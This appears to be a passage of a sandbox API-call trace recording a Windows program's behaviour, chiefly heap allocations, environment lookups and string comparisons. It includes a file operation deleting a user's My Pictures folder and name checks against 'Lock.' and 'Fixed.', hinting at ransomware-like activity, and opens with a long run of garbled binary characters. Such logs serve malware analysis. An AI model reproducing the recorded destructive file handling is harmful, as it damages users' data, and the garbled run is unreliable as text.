楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Documents\\My Pictures", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38540b0 | out: hHeap=0x2af0000) returned 1 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.794] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0218.794] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.794] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0218.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0218.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0218.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0218.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Shapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0218.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Shapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0218.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0218.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hapes", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0218.795] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0218.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0218.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0218.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Shapes", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0218.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Shapes", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0218.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shapes", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0218.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0218.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0218.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0218.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.797] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0218.797] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0218.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0218.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0218.797] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0218.798] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854830 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0218.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0218.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0218.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0218.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0218.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0218.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0218.799] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0218.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0218.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0218.800] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0218.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0218.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.800] HeapFree (in: 